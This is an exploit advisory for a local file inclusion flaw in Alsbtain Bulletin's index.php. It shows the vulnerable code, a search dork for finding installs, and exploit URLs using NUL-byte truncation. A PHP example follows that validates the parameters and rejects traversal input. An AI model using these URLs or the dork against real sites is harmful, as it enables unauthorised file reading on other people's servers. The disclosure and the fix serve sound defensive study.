# Title : Alsbtain Bulletin (index.php) Local File include
# Author : Null H4ck3r
# Product : Alsbtain ( Alsbtain Bulletin )
# Vendor : http://www.alsbtain.net/ipb/
# Date : 25/10/2011
# Version : 1.5 , 1.6
# Tested on : windows
# Dork : Powered By Alsbtain Bulletin 1.6 & Powered By Alsbtain Bulletin 1.5
# Contact : Null.H4ck3r@Yahoo.com
================================================================

Vuln file : index.php
~~~~~~~~~~~~~~~~~~~~~~~
Vuln code:

$act=str_replace('idsb', '&id=', $_GET['act']);
header( "HTTP/1.1 301 Moved Permanently" );
header( "Status: 301 Moved Permanently" );
header( "Location: ?act=".$act );
}
include("styles/$style/header.php");
include("includes/stats/addhome.php");
include("styles/$style/menu_start.php");
if(is_file("includes/".$_GET['act'].".php")){
    include("includes/".$_GET['act'].".php");
} else {
    include("includes/home.php");
}
~~~~~~~~~~~~~~~~~~~~~~~
Exploit:

http://localhost/index.php?style=[LFI]%00
http://localhost/index.php?act=[LFI]%00
===============================================================
That's it xD
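
The `%00` in both exploit URLs truncates the appended suffix on PHP builds before 5.3.4, and even without it `act` can reach other `.php` files through `../`. The following is an added example (not code from the advisory or from Alsbtain Bulletin) of validating `act` and `style` before they reach `include`. The helper `resolve_include()`, the token pattern and the temp-dir layout are assumptions made for illustration.

```php
<?php
// Added example, not the product's code. resolve_include() is a hypothetical helper.
// $token is the request value; $tail is a fixed, trusted suffix such as ".php".
function resolve_include(string $base, $token, string $tail): ?string
{
    // Plain token only: rejects "/", "\", "..", NUL bytes (decoded %00) and arrays.
    if (!is_string($token) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $token)) {
        return null;
    }
    $baseReal = realpath($base);
    $real     = realpath($base . '/' . $token . $tail);
    if ($baseReal === false || $real === false || !is_file($real)) {
        return null;
    }
    // Defence in depth: a symlink under $base must not resolve outside it.
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed layout in a temp dir standing in for the application root.
$root = realpath(sys_get_temp_dir()) . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir("$root/includes", 0700, true);
mkdir("$root/styles/default", 0700, true);
file_put_contents("$root/includes/home.php", '<?php // home');
file_put_contents("$root/includes/forum.php", '<?php // forum');
file_put_contents("$root/styles/default/header.php", '<?php // header');
file_put_contents("$root/secret.php", '<?php // outside includes/');

// Constructed request values: two valid pages, then traversal, NUL and array input.
foreach (['forum', 'home', '../secret', "../secret.php\0", 'missing', ['x']] as $act) {
    // Same fallback to home.php as the original when the page is not accepted.
    $path = resolve_include("$root/includes", $act, '.php') ?? "$root/includes/home.php";
    printf("act=%-24s -> %s\n", json_encode($act), substr($path, strlen($root)));
}

// The style name gets the same check before any "styles/$style/..." path is built.
foreach (['default', '../includes', "default\0"] as $style) {
    $path = resolve_include("$root/styles", $style, '/header.php');
    printf("style=%-22s -> %s\n", json_encode($style), $path === null ? 'rejected' : substr($path, strlen($root)));
}
```

Only `forum`, `home` and the `default` style resolve to their own files; every other `act` value falls back to `home.php` and the remaining style values are rejected.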